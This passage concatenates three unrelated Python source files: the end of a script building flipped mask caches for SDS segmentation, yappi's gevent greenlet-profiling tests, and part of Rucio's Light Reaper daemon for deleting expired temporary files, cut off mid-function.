            # Some arrays need a new axis inserted to be consistent with savemat
            roidb = {
                'masks': (all_masks >= cfg.BINARIZE_THRESH).astype(bool),
                'boxes': all_boxes,
                'det_overlap': det_overlaps[:, np.newaxis],
                'seg_overlap': seg_overlaps,
                'mask_targets': (mask_targets >= cfg.BINARIZE_THRESH).astype(bool),
                'gt_classes': gt_classes[:, np.newaxis],
                'output_label': output_label,
                'gt_assignment': seg_assignment[:, np.newaxis],
                'Flip': False
            }
            sio.savemat(output_cache, roidb)
            use_time = time.time() - timer_tic
            print '%d/%d use time %f' % (cnt, len(file_list), use_time)
def process_flip_masks(image_names, im_start, im_end):
    """Write horizontally-flipped maskdb .mat caches for images [im_start, im_end).

    For each image whose original '<name>.mat' cache exists in the module-level
    output directory, mirror the masks and mask regression targets along the
    x axis, mirror the box x-coordinates against the image width, and save the
    result as '<name>_flip.mat'.  Images whose flipped cache already exists are
    skipped, so interrupted runs can be resumed.
    """
    # Image widths are needed to mirror box x-coordinates.
    # NOTE(review): widths are computed for *all* images, not only the
    # [im_start, im_end) slice this worker handles — confirm intended.
    widths = [PIL.Image.open('data/VOCdevkitSDS/img/' + im_name + '.jpg').size[0] for im_name in image_names]
    cache_dir = output_dir  # module-level output directory set in __main__
    if not os.path.isdir(cache_dir):
        os.makedirs(cache_dir)
    for idx in xrange(im_start, im_end):
        flip_cache = os.path.join(cache_dir, image_names[idx] + '_flip.mat')
        if os.path.exists(flip_cache):
            # Already produced by an earlier run.
            continue
        # Load the original (non-flipped) maskdb for this image.
        source = sio.loadmat(os.path.join(cache_dir, image_names[idx] + '.mat'))
        # Mirror masks and mask regression targets along the horizontal axis.
        flipped_masks = source['masks'][:, :, ::-1]
        flipped_targets = source['mask_targets'][:, :, ::-1]
        # Mirror box x-coordinates: x' = width - x - 1 (x1 and x2 swap roles).
        boxes = source['boxes']
        old_x1 = boxes[:, 0].copy()
        old_x2 = boxes[:, 2].copy()
        boxes[:, 0] = widths[idx] - old_x2 - 1
        boxes[:, 2] = widths[idx] - old_x1 - 1
        assert (boxes[:, 2] >= boxes[:, 0]).all()
        # All remaining maskdb fields are identical to the original entry.
        sio.savemat(flip_cache, {
            'masks': (flipped_masks >= cfg.BINARIZE_THRESH).astype(bool),
            'boxes': boxes,
            'det_overlap': source['det_overlap'],
            'seg_overlap': source['seg_overlap'],
            'mask_targets': (flipped_targets >= cfg.BINARIZE_THRESH).astype(bool),
            'gt_classes': source['gt_classes'],
            'gt_assignment': source['gt_assignment'],
            'Flip': True,
            'output_label': source['output_label']
        })
if __name__ == '__main__':
    # Script driver: prepares MCG maskdb caches for train/val, fanning the
    # work out over args.para_job worker processes.
    args = parse_args()
    input_dir = args.input_dir
    assert os.path.exists(input_dir), 'Path does not exist: {}'.format(input_dir)
    output_dir = args.output_dir
    if not os.path.isdir(output_dir):
        os.makedirs(output_dir)
    mask_size = args.mask_size
    # Image list depends on the requested split.
    list_name = 'data/VOCdevkitSDS/train.txt' if args.db_name == 'train' else 'data/VOCdevkitSDS/val.txt'
    with open(list_name) as f:
        file_list = f.read().splitlines()
    # If we want to prepare training maskdb, first try to load gts
    if args.db_name == 'train':
        if os.path.exists(args.roidb) and os.path.exists(args.maskdb):
            # Cached ground truths exist: load the pickled roidb/maskdb.
            with open(args.roidb, 'rb') as f:
                gt_roidbs = cPickle.load(f)
            with open(args.maskdb, 'rb') as f:
                gt_maskdbs = cPickle.load(f)
        else:
            # Otherwise build ground truths from the SDS dataset directly.
            db = PascalVOCSeg('train', '2012', 'data/VOCdevkitSDS/')
            gt_roidbs = db.gt_roidb()
            gt_maskdbs = db.gt_maskdb()
    top_k = args.top_k
    num_process = args.para_job
    # Prepare train/val maskdb use multi-process
    # Each worker gets a contiguous [file_start, file_end) slice of file_list.
    # NOTE(review): workers appear to rely on fork-inherited module globals
    # (output_dir, mask_size, top_k, gt_roidbs, ...) — confirm on non-fork platforms.
    processes = []
    file_start = 0
    file_offset = int(np.ceil(len(file_list) / float(num_process)))
    for process_id in xrange(num_process):
        file_end = min(file_start + file_offset, len(file_list))
        p = Process(target=process_roidb, args=(file_start, file_end, args.db_name))
        p.start()
        processes.append(p)
        file_start += file_offset
    for p in processes:
        p.join()
    # If db_name == 'train', we still need to add flipped maskdb into output folder
    # Add flipped mask and mask regression targets after prepare the original mcg proposals
    if args.db_name == 'train':
        print 'Appending flipped MCG to ROI'
        # Same slicing scheme as above, now for the flipped caches.
        processes = []
        file_start = 0
        file_offset = int(np.ceil(len(file_list) / float(num_process)))
        for process_id in xrange(num_process):
            file_end = min(file_start + file_offset, len(file_list))
            p = Process(target=process_flip_masks, args=(file_list, file_start, file_end))
            p.start()
            processes.append(p)
            file_start += file_offset
        for p in processes:
            p.join()
|
test_gevent.py | import unittest
import _yappi
import yappi
import gevent
from gevent.event import Event
import threading
from .utils import (
YappiUnitTestCase, find_stat_by_name, burn_cpu, burn_io,
burn_io_gevent
)
class GeventTestThread(threading.Thread):
    """Thread subclass that names its root greenlet and gevent hub.

    Each native thread gevent runs in has its own hub; labelling both the
    thread's current greenlet and the hub lets the yappi context-name
    callback produce readable greenlet stats in the tests below.
    """

    def __init__(self, name, *args, **kwargs):
        super(GeventTestThread, self).__init__(*args, **kwargs)
        # Stored so run() can propagate it to the greenlet executing the thread.
        self.name = name

    def run(self):
        # Tag this thread's root greenlet and its hub before running the target.
        gevent.getcurrent().name = self.name
        gevent.get_hub().name = "Hub"
        super(GeventTestThread, self).run()
class GeventTest(YappiUnitTestCase):
    """Base test case: CPU-clock profiling with greenlet contexts.

    Provides helpers to spawn named greenlets/threads so that greenlet
    stats can be matched by hierarchical names like "Main/a/a_1".
    """

    def setUp(self):
        super(GeventTest, self).setUp()
        # Profile CPU time per greenlet context; contexts are named through
        # get_greenlet_name so expected stat tables can refer to them.
        yappi.set_clock_type("cpu")
        yappi.set_context_backend("greenlet")
        yappi.set_context_name_callback(self.get_greenlet_name)
        gevent.getcurrent().name = "Main"
        gevent.get_hub().name = "Hub"

    @classmethod
    def get_greenlet_name(cls):
        """Context-name callback: the current greenlet's assigned name,
        or None for greenlets never explicitly named."""
        try:
            return gevent.getcurrent().name
        except AttributeError:
            return None

    @classmethod
    def spawn_greenlet(cls, name, func, *args, **kwargs):
        """Spawn a greenlet whose name is nested under the caller's name."""
        name = "%s/%s" % (cls.get_greenlet_name(), name)
        gl = gevent.Greenlet(func, *args, **kwargs)
        gl.name = name
        gl.start()
        return gl

    @classmethod
    def spawn_thread(cls, name, func, *args, **kwargs):
        """Spawn a GeventTestThread with a hierarchical name (see its run())."""
        name = "%s/%s" % (cls.get_greenlet_name(), name)
        t = GeventTestThread(name, target=func, args=args, kwargs=kwargs)
        t.start()
        return t
class TestAPI(GeventTest):
    """API-level checks: start flags, backend switching rules, stat getters."""

    def test_start_flags(self):
        """start() records its flags and creates exactly one greenlet context."""
        self.assertEqual(_yappi._get_start_flags(), None)
        yappi.start()

        def a():
            pass

        a()
        self.assertEqual(_yappi._get_start_flags()["profile_builtins"], 0)
        self.assertEqual(_yappi._get_start_flags()["profile_multicontext"], 1)
        self.assertEqual(len(yappi.get_greenlet_stats()), 1)
        yappi.stop()
        yappi.clear_stats()
        # profile_threads=False must not disable greenlet multicontext profiling.
        yappi.start(builtins=True, profile_greenlets=True, profile_threads=False)
        self.assertEqual(_yappi._get_start_flags()["profile_builtins"], 1)
        self.assertEqual(_yappi._get_start_flags()["profile_multicontext"], 1)
        self.assertEqual(len(yappi.get_greenlet_stats()), 1)
        yappi.stop()

    def test_context_change_exception(self):
        """Backend can only change after stats collected under it are cleared."""
        yappi.start()

        def a():
            pass

        a()
        # Setting to same backend should succeed
        # Changing backend should fail
        self.assertRaises(_yappi.error, yappi.set_context_backend, "native_thread")
        yappi.stop()
        # Still fail, stats need to be cleared
        self.assertRaises(_yappi.error, yappi.set_context_backend, "native_thread")
        yappi.clear_stats()
        # Should succeed now
        yappi.set_context_backend("native_thread")
        yappi.stop()

    def test_get_context_stat_exception(self):
        """With the greenlet backend, get_thread_stats() must raise."""
        yappi.start()

        def a():
            pass

        a()
        yappi.stop()
        self.assertRaises(yappi.YappiError, yappi.get_thread_stats)
        self.assertEqual(len(yappi.get_greenlet_stats()), 1)

    def test_context_cbks_reset_to_default(self):
        """Switching back to native_thread restores default context callbacks,
        so greenlets are no longer tracked as separate contexts."""
        yappi.set_context_backend("greenlet")
        yappi.set_context_backend("native_thread")

        class ThreadA(threading.Thread):
            def run(self):
                burn_cpu(0.05)

        def a():
            pass

        yappi.start()
        t = ThreadA()
        t.start()
        t.join()
        # Spawn a greenlet to test that greenlet context is not recognised
        g = gevent.Greenlet(a)
        g.start()
        g.get()
        yappi.stop()
        tstats = yappi.get_thread_stats()
        self.assertEqual(len(tstats), 2, "Incorrect number of contexts captured")
        # First stat should be of threadA since it is sorted by ttot
        statsA = tstats[0]
        self.assertEqual(statsA.tid, t.ident)
        self.assertEqual(statsA.name, t.__class__.__name__)
        statsMain = tstats[1]
        main_thread = threading.current_thread()
        self.assertEqual(statsMain.tid, main_thread.ident)
        self.assertEqual(statsMain.name, main_thread.__class__.__name__)
class SingleThreadTests(GeventTest):
    """Greenlet profiling scenarios confined to the main native thread.

    NOTE(review): the expected trace tables below embed file:line prefixes
    from a different checkout (e.g. test_asyncio.py); presumably
    assert_traces_almost_equal matches fuzzily on names — verify.
    """

    def test_recursive_greenlet(self):
        """Greenlets recursively spawning greenlets: per-context CPU time."""
        def a(n):
            if n <= 0:
                return
            burn_io_gevent(0.1)
            burn_cpu(0.1)
            g1 = self.spawn_greenlet("a_%d" % (n-1), a, n - 1)
            g1.get()
            g2 = self.spawn_greenlet("a_%d" % (n-2), a, n - 2)
            g2.get()

        yappi.start()
        g = self.spawn_greenlet("a", a, 3)
        g.get() # run until complete, report exception (if any)
        yappi.stop()
        r1 = '''
        ..p/yappi/tests/test_asyncio.py:11 a 9 0.000124 0.400667 0.044519
        ../yappi/tests/utils.py:126 burn_cpu 4 0.000000 0.400099 0.100025
        sleep 4 0.000000 0.000444 0.000111
        '''
        stats = yappi.get_func_stats()
        self.assert_traces_almost_equal(r1, stats)
        gstats = yappi.get_greenlet_stats()
        r2 = '''
        Main/a/a_1 9 0.100588 3
        Main/a/a_2 4 0.100588 3
        Main/a 3 0.100584 3
        Main/a/a_2/a_1 5 0.100549 3
        Main 1 0.000356 2
        Main/a/a_1/a_0 10 0.000046 1
        Main/a/a_2/a_1/a_0 6 0.000044 1
        Main/a/a_2/a_1/a_-1 7 0.000036 1
        Main/a/a_2/a_0 8 0.000035 1
        Main/a/a_1/a_-1 11 0.000029 1
        '''
        self.assert_ctx_stats_almost_equal(r2, gstats)

    def test_basic_old_style(self):
        """Same workload profiled twice: wall clock first, then CPU clock."""
        def a():
            burn_io_gevent(0.1)
            burn_io(0.1)
            burn_io_gevent(0.1)
            burn_io(0.1)
            burn_io_gevent(0.1)
            burn_cpu(0.3)

        # Wall clock: gevent sleeps count toward totals.
        yappi.set_clock_type("wall")
        yappi.start(builtins=True)
        g1 = self.spawn_greenlet("a_1", a)
        g1.get()
        g2 = self.spawn_greenlet("a_2", a)
        g2.get()
        yappi.stop()
        r1 = '''
        ..p/yappi/tests/test_asyncio.py:43 a 2 0.000118 1.604049 0.802024
        burn_io_gevent 6 0.000000 0.603239 0.100540
        ../yappi/tests/utils.py:126 burn_cpu 2 0.000000 0.600026 0.300013
        ..p/yappi/tests/utils.py:135 burn_io 4 0.000025 0.400666 0.100166
        '''
        stats = yappi.get_func_stats()
        self.assert_traces_almost_equal(r1, stats)
        gstats = yappi.get_greenlet_stats()
        r2 = '''
        Main 1 1.623057 3
        Main/a_1 3 0.812399 1
        Main/a_2 4 0.810234 1
        '''
        self.assert_ctx_stats_almost_equal(r2, gstats)
        yappi.clear_stats()
        # CPU clock: only burn_cpu time should dominate.
        yappi.set_clock_type("cpu")
        yappi.start(builtins=True)
        g1 = self.spawn_greenlet("a_1", a)
        g1.get()
        g2 = self.spawn_greenlet("a_2", a)
        g2.get()
        yappi.stop()
        stats = yappi.get_func_stats()
        r1 = '''
        ..p/yappi/tests/test_asyncio.py:43 a 2 0.000117 0.601170 0.300585
        ../yappi/tests/utils.py:126 burn_cpu 2 0.000000 0.600047 0.300024
        burn_io_gevent 6 0.000159 0.000801 0.000134
        '''
        self.assert_traces_almost_equal(r1, stats)
        gstats = yappi.get_greenlet_stats()
        r2 = '''
        Main/a_2 6 0.301190 1
        Main/a_1 5 0.300960 1
        Main 1 0.000447 3
        '''
        self.assert_ctx_stats_almost_equal(r2, gstats)

    def test_recursive_function(self):
        """Plain function recursion *inside* greenlets (no nested spawns)."""
        def a(n):
            if (n <= 0):
                return
            burn_io_gevent(0.001)
            burn_cpu(0.1)
            a(n - 1)
            a(n - 2)

        def driver():
            gls = []
            for i in (3, 4):
                gls.append(self.spawn_greenlet("recursive_%d" % (i), a, i))
            for gl in gls:
                gl.get()

        yappi.set_clock_type("cpu")
        yappi.start()
        driver()
        yappi.stop()
        r1 = '''
        tests/test_gevent.py:209 a 24/2 0.000407 1.102129 0.045922
        ../yappi/tests/utils.py:142 burn_cpu 11 0.000000 1.100660 0.100060
        ../tests/utils.py:154 burn_io_gevent 11 0.000159 0.001062 0.000097
        ..e-packages/gevent/hub.py:126 sleep 11 0.000903 0.000903 0.000082
        tests/test_gevent.py:219 driver 1 0.000208 0.000467 0.000467
        '''
        stats = yappi.get_func_stats()
        self.assert_traces_almost_equal(r1, stats)
        gstats = yappi.get_greenlet_stats()
        r2 = '''
        Main/recursive_4 4 0.701283 5
        Main/recursive_3 3 0.400664 5
        Main 1 0.000439 3
        '''
        self.assert_ctx_stats_almost_equal(r2, gstats)

    def test_exception_raised(self):
        """Stats stay consistent when the profiled greenlet raises."""
        def a(n):
            burn_cpu(0.1)
            burn_io_gevent(0.1)
            if (n == 0):
                raise Exception
            a(n-1)

        yappi.set_clock_type("cpu")
        yappi.start()
        try:
            gevent.spawn(a, 3).get()
        except Exception:
            pass
        yappi.stop()
        stats = yappi.get_func_stats()
        t1 = '''
        tests/test_gevent.py:118 a 4/1 0.000149 0.400614 0.100153
        ../yappi/tests/utils.py:126 burn_cpu 4 0.000000 0.400208 0.100052
        '''
        self.assert_traces_almost_equal(t1, stats)

    def test_greenlets_spawned_before_profile(self):
        """A greenlet started before yappi.start() is profiled only from the
        point it resumes after profiling begins."""
        def a(ev1, ev2):
            a_inner_1(ev1, ev2)
            burn_cpu(0.1)

        def a_inner_1(ev1, ev2):
            a_inner_2(ev1, ev2)
            burn_cpu(0.1)

        def a_inner_2(ev1, ev2):
            ev1.set()
            ev2.wait()
            a_inner_3()

        def a_inner_3():
            burn_cpu(0.1)
            burn_io_gevent(0.1)

        ev1 = Event()
        ev2 = Event()
        gl = self.spawn_greenlet("a", a, ev1, ev2)
        # wait for greenlet to pause
        ev1.wait()
        yappi.set_clock_type("cpu")
        yappi.start()
        # resume greenlet and wait for completion
        ev2.set()
        gl.get()
        yappi.stop()
        stats = yappi.get_func_stats()
        t1 = '''
        ../yappi/tests/utils.py:126 burn_cpu 3 0.000000 0.300119 0.100040
        tests/test_gevent.py:161 a_inner_3 1 0.000041 0.100209 0.100209
        '''
        self.assert_traces_almost_equal(t1, stats)
        gstats = yappi.get_greenlet_stats()
        r2 = '''
        Main/a 2 0.300425 1
        Main 1 0.000145 2
        '''
        self.assert_ctx_stats_almost_equal(r2, gstats)

    def test_many_context_switches(self):
        """200 gevent switches per greenlet: per-context switch counts (201)
        and CPU totals must still add up."""
        def common():
            for _ in range(100):
                burn_io_gevent(0.001)
            burn_io(0.1)
            burn_cpu(0.2)
            for _ in range(100):
                burn_io_gevent(0.001)
            burn_io(0.1)
            burn_cpu(0.2)

        def a():
            common()

        def b():
            common()

        def driver():
            gls = []
            for idx, func in enumerate((a, a, b, b)):
                gls.append(self.spawn_greenlet("func_%d" % (idx), func))
            for gl in gls:
                gl.get()

        yappi.set_clock_type("cpu")
        yappi.start()
        driver()
        yappi.stop()
        stats = yappi.get_func_stats()
        t1 = '''
        tests/test_gevent.py:128 common 4 0.004040 1.619333 0.404833
        ../yappi/tests/utils.py:126 burn_cpu 8 0.000000 1.600398 0.200050
        tests/test_gevent.py:141 a 2 0.000021 0.810061 0.405030
        tests/test_gevent.py:144 b 2 0.000021 0.809314 0.404657
        '''
        self.assert_traces_almost_equal(t1, stats)
        gstats = yappi.get_greenlet_stats()
        r2 = '''
        Main/func_3 6 0.417321 201
        Main/func_2 5 0.416521 201
        Main/func_0 3 0.414553 201
        Main/func_1 4 0.413268 201
        Main 1 0.000579 3
        '''
        self.assert_ctx_stats_almost_equal(r2, gstats)

    def test_default_context_name_cbk(self):
        """Without a custom name callback, contexts are named after the
        greenlet's class."""
        # Set context backend to configure default callbacks
        yappi.set_context_backend("greenlet")

        def a():
            burn_cpu(0.1)

        class GreenletA(gevent.Greenlet):
            pass

        yappi.start()
        g = GreenletA(a)
        g.start()
        g.get()
        yappi.stop()
        gstats = yappi.get_greenlet_stats()
        r2 = '''
        GreenletA 3 0.100060 1
        greenlet 1 0.000240 2
        '''
        self.assert_ctx_stats_almost_equal(r2, gstats)
class MultiThreadTests(GeventTest):
    """Greenlet profiling with work spread over multiple native threads."""

    def test_basic(self):
        """Mix of plain, nested and recursive greenlets across four threads;
        verifies the full hierarchical context tree."""
        def a():
            burn_io_gevent(0.3)
            burn_cpu(0.4)

        def b():
            g = self.spawn_greenlet("a", a)
            return g.get()

        def recursive_a(n):
            if not n:
                return
            burn_cpu(0.3)
            burn_io_gevent(0.3)
            g = self.spawn_greenlet("rec_a", recursive_a, n - 1)
            return g.get()

        yappi.set_clock_type("cpu")

        def driver():
            to_run = [
                (a, ()),
                (b, ()),
                (recursive_a, (5,)),
                (recursive_a, (5,))
            ]
            ts = []
            for idx, (func, args) in enumerate(to_run):
                t = self.spawn_thread("%s-%d" % (func.__name__, idx), func, *args)
                ts.append(t)
            for t in ts:
                t.join()

        yappi.start()
        driver()
        yappi.stop()
        traces = yappi.get_func_stats()
        t1 = '''
        ../yappi/tests/utils.py:126 burn_cpu 12 0.000000 3.801261 0.316772
        tests/test_gevent.py:96 recursive_a 12 0.001707 3.014276 0.251190
        tests/test_gevent.py:88 a 2 0.000088 0.800840 0.400420
        burn_io_gevent 12 0.011484 0.011484 0.000957
        tests/test_gevent.py:132 driver 1 0.000169 0.009707 0.009707
        tests/test_gevent.py:92 b 1 0.000121 0.000162 0.000162
        '''
        self.assert_traces_almost_equal(t1, traces)
        stats = yappi.get_greenlet_stats()
        r2 = '''
        Main/a-0 2 0.400421 59
        Main/b-1/a 6 0.400228 58
        Main/recursive_a-3 8 0.301177 33
        Main/recursive_a-2 7 0.300615 36
        Main/recursive_a-2/rec_a/rec_a/rec_a 16 0.300509 42
        Main/recursive_a-2/rec_a/rec_a/rec_a/rec_a 18 0.300505 42
        Main/recursive_a-3/rec_a/rec_a/rec_a/rec_a 17 0.300481 39
        Main/recursive_a-3/rec_a 11 0.300464 45
        Main/recursive_a-3/rec_a/rec_a 13 0.300456 35
        Main/recursive_a-3/rec_a/rec_a/rec_a 15 0.300456 36
        Main/recursive_a-2/rec_a/rec_a 14 0.300423 29
        Main/recursive_a-2/rec_a 12 0.300359 41
        Main 1 0.002443 7
        Main/b-1 4 0.000595 2
        Main/recursive_a-3/rec_a/rec_a/rec_a/rec_a/rec_a 19 0.000048 1
        Main/recursive_a-2/rec_a/rec_a/rec_a/rec_a/rec_a 20 0.000047 1
        '''
        self.assert_ctx_stats_almost_equal(r2, stats)

    def test_profile_greenlets_false(self):
        """profile_greenlets=False: only the context that called start()
        (Main) is profiled; worker threads/greenlets are invisible."""
        def recursive_a(n):
            if not n:
                return
            burn_cpu(0.1)
            burn_io_gevent(0.1)
            g = self.spawn_greenlet("rec", recursive_a, n - 1)
            return g.get()

        yappi.set_clock_type("cpu")

        def driver():
            to_run = [
                (recursive_a, (5,)),
                (recursive_a, (5,))
            ]
            ts = []
            for idx, (func, args) in enumerate(to_run):
                t = self.spawn_thread("%s_%d" % (func.__name__, idx), func, *args)
                ts.append(t)
            # This call runs on the profiled (Main) context.
            recursive_a(6)
            for t in ts:
                t.join()

        yappi.start(profile_greenlets=False)
        driver()
        yappi.stop()
        traces = yappi.get_func_stats()
        t1 = '''
        tests/test_gevent.py:359 driver 1 0.000061 0.101845 0.101845
        tests/test_gevent.py:335 recursive_a 1 0.000262 0.100619 0.100619
        ../yappi/tests/utils.py:126 burn_cpu 1 0.000000 0.100082 0.100082
        '''
        self.assert_traces_almost_equal(t1, traces)
        gstats = yappi.get_greenlet_stats()
        r2 = '''
        Main 1 0.101944 1
        '''
        self.assert_ctx_stats_almost_equal(r2, gstats)

    def test_default_ctx_name_callback(self):
        """Default naming (greenlet class name) works across native threads."""
        # Set context backend to confgiure default callbacks
        yappi.set_context_backend("greenlet")

        class GreenletA(gevent.Greenlet):
            pass

        def thread_a():
            g = GreenletA(a)
            g.start()
            g.get()

        def a():
            burn_cpu(0.1)

        def thread_b():
            g = GreenletB(b)
            g.start()
            g.get()

        class GreenletB(gevent.Greenlet):
            pass

        def b():
            burn_cpu(0.2)

        def driver():
            tA = self.spawn_thread("a", thread_a)
            tB = self.spawn_thread("b", thread_b)
            tA.join()
            tB.join()

        yappi.start()
        driver()
        yappi.stop()
        gstats = yappi.get_greenlet_stats()
        r2 = '''
        GreenletB 7 0.200104 9
        GreenletA 4 0.100082 8
        '''
        self.assert_ctx_stats_almost_equal(r2, gstats)
# Allow running this test module directly (outside the test runner).
if __name__ == '__main__':
    unittest.main()
|
light_reaper.py | # -*- coding: utf-8 -*-
# Copyright 2016-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vincent.garonne@cern.ch>, 2016-2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2019-2021
# - Brandon White <bjwhite@fnal.gov>, 2019
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
# - David Poblaciรณn Criado <david.poblacion.criado@cern.ch>, 2021
# - Joel Dierkes <joel.dierkes@cern.ch>, 2021
'''
Light Reaper is a daemon to manage temporary object/file deletion.
'''
import hashlib
import logging
import os
import random
import socket
import sys
import threading
import time
import traceback
import rucio.db.sqla.util
from rucio.common.config import config_get_bool
from rucio.common.exception import (SourceNotFound, DatabaseException, ServiceUnavailable,
RSEAccessDenied, RSENotFound, ResourceTemporaryUnavailable, VONotFound)
from rucio.common.logging import setup_logging, formatted_logger
from rucio.common.utils import daemon_sleep
from rucio.core import rse as rse_core
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.message import add_message
from rucio.core.rse_expression_parser import parse_expression
from rucio.core.temporary_did import (list_expired_temporary_dids, delete_temporary_dids)
from rucio.core.vo import list_vos
from rucio.rse import rsemanager as rsemgr
logging.getLogger("requests").setLevel(logging.CRITICAL)
GRACEFUL_STOP = threading.Event()
def reaper(rses=None, worker_number=0, total_workers=1, chunk_size=100, once=False, scheme=None, sleep_time=60):
    """
    Main loop to select and delete files.

    :param rses: List of RSEs the reaper should work against. If None or empty, it considers all RSEs.
    :param worker_number: The worker number.
    :param total_workers: The total number of workers.
    :param chunk_size: the size of chunk for deletion.
    :param once: If True, only runs one iteration of the main loop.
    :param scheme: Force the reaper to use a particular protocol, e.g., mock.
    :param sleep_time: Thread sleep time after each chunk of work.
    """
    # Avoid the shared-mutable-default pitfall (random.shuffle below mutates rses).
    if rses is None:
        rses = []
    logging.info('Starting Light Reaper %s-%s: Will work on RSEs: %s', worker_number, total_workers, ', '.join([rse['rse'] for rse in rses]))
    pid = os.getpid()
    thread = threading.current_thread()
    hostname = socket.gethostname()
    executable = ' '.join(sys.argv)
    # hashlib requires bytes: feeding the raw str raises TypeError on Python 3.
    hash_executable = hashlib.sha256((sys.argv[0] + ''.join([rse['rse'] for rse in rses])).encode()).hexdigest()
    sanity_check(executable=None, hostname=hostname)
    while not GRACEFUL_STOP.is_set():
        try:
            # heartbeat: register this worker and learn its thread assignment
            heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
            prepend_str = 'light-reaper [%i/%i] : ' % (heartbeat['assign_thread'], heartbeat['nr_threads'])
            logger = formatted_logger(logging.log, prepend_str + '%s')
            logger(logging.INFO, 'Live gives {0[heartbeat]}'.format(locals()))
            nothing_to_do = True
            start_time = time.time()
            # Shuffle so concurrent workers do not all hit the RSEs in the same order.
            random.shuffle(rses)
            for rse in rses:
                rse_id = rse['id']
                rse = rse['rse']
                replicas = list_expired_temporary_dids(rse_id=rse_id,
                                                       limit=chunk_size, worker_number=worker_number,
                                                       total_workers=total_workers)
                rse_info = rsemgr.get_rse_info(rse_id=rse_id)
                prot = rsemgr.create_protocol(rse_info, 'delete', scheme=scheme)
                deleted_replicas = []
                try:
                    prot.connect()
                    for replica in replicas:
                        nothing_to_do = False
                        try:
                            # Build the PFN directly for S3-style storage instead of
                            # going through rsemgr.lfns2pfns.
                            pfn = 's3://%s%s%s' % (prot.attributes['hostname'], prot.attributes['prefix'], replica['name'])
                            start = time.time()
                            prot.delete(pfn)
                            duration = time.time() - start
                            logger(logging.INFO, 'Deletion SUCCESS of %s:%s as %s on %s in %s seconds', replica['scope'], replica['name'], pfn, rse, duration)
                            payload = {'scope': replica['scope'].external,
                                       'name': replica['name'],
                                       'rse': rse,
                                       'rse_id': rse_id,
                                       'file-size': replica.get('bytes') or 0,
                                       'bytes': replica.get('bytes') or 0,
                                       'url': pfn,
                                       'duration': duration,
                                       'protocol': prot.attributes['scheme']}
                            if replica['scope'].vo != 'def':
                                payload['vo'] = replica['scope'].vo
                            add_message('deletion-done', payload)
                            deleted_replicas.append(replica)
                        except SourceNotFound:
                            # Already gone on storage: treat as deleted so the DB entry is removed.
                            err_msg = 'Deletion NOTFOUND of %s:%s as %s on %s' % (replica['scope'], replica['name'], pfn, rse)
                            logger(logging.WARNING, err_msg)
                            deleted_replicas.append(replica)
                        except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
                            # Transient or permission failure: report it, keep the DB entry for retry.
                            err_msg = 'Deletion NOACCESS of %s:%s as %s on %s: %s' % (replica['scope'], replica['name'], pfn, rse, str(error))
                            logger(logging.WARNING, err_msg)
                            payload = {'scope': replica['scope'].external,
                                       'name': replica['name'],
                                       'rse': rse,
                                       'rse_id': rse_id,
                                       'file-size': replica['bytes'] or 0,
                                       'bytes': replica['bytes'] or 0,
                                       'url': pfn,
                                       'reason': str(error),
                                       'protocol': prot.attributes['scheme']}
                            if replica['scope'].vo != 'def':
                                payload['vo'] = replica['scope'].vo
                            add_message('deletion-failed', payload)
                        except Exception:
                            # Unexpected per-replica failure: log and continue with the next replica.
                            logger(logging.CRITICAL, traceback.format_exc())
                finally:
                    prot.close()
                # Remove the successfully deleted (or already-absent) DIDs from the DB.
                delete_temporary_dids(dids=deleted_replicas)
                if once:
                    break
            if once:
                break
            if nothing_to_do:
                # Report the configured sleep time instead of a hardcoded 60s.
                logger(logging.INFO, 'Nothing to do. I will sleep for %s seconds', sleep_time)
                daemon_sleep(start_time=start_time, sleep_time=sleep_time, graceful_stop=GRACEFUL_STOP)
        except DatabaseException as error:
            logging.warning('Reaper: %s', str(error))
        except Exception:
            logging.critical(traceback.format_exc())
    die(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
    logging.info('Graceful stop requested')
    logging.info('Graceful stop done')
    return
def stop(signum=None, frame=None):
    """
    Graceful exit.

    Signal-handler compatible (accepts the signum/frame arguments that
    signal.signal passes); simply flags the reaper loops to finish.
    """
    GRACEFUL_STOP.set()
def run(total_workers=1, chunk_size=100, once=False, rses=None, scheme=None,
        exclude_rses=None, include_rses=None, vos=None, delay_seconds=0, sleep_time=60):
    """
    Starts up the reaper threads.

    :param total_workers: The total number of workers.
    :param chunk_size: the size of chunk for deletion.
    :param once: If True, only runs one iteration of the main loop.
    :param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs. (Single-VO only)
    :param scheme: Force the reaper to use a particular protocol/scheme, e.g., mock.
    :param exclude_rses: RSE expression to exclude RSEs from the Reaper.
    :param include_rses: RSE expression to include RSEs.
    :param vos: VOs on which to look for RSEs. Only used in multi-VO mode.
                If None, we either use all VOs if run from "def", or the current VO otherwise.
    :param delay_seconds: Accepted for interface compatibility; not used by this daemon.
    :param sleep_time: Thread sleep time after each chunk of work.
    """
    # Avoid a shared mutable default argument.
    rses = rses or []
    setup_logging()
    if rucio.db.sqla.util.is_old_db():
        raise DatabaseException('Database was not updated, daemon won\'t start')
    logging.info('main: starting processes')
    multi_vo = config_get_bool('common', 'multi_vo', raise_exception=False, default=False)
    if not multi_vo:
        if vos:
            logging.warning('Ignoring argument vos, this is only applicable in a multi-VO setup.')
        vos = ['def']
    else:
        if vos:
            # Validate the requested VOs against the known ones.
            invalid = set(vos) - set([v['vo'] for v in list_vos()])
            if invalid:
                msg = 'VO{} {} cannot be found'.format('s' if len(invalid) > 1 else '', ', '.join([repr(v) for v in invalid]))
                raise VONotFound(msg)
        else:
            vos = [v['vo'] for v in list_vos()]
    # Lazy %-style logging args instead of eager string interpolation.
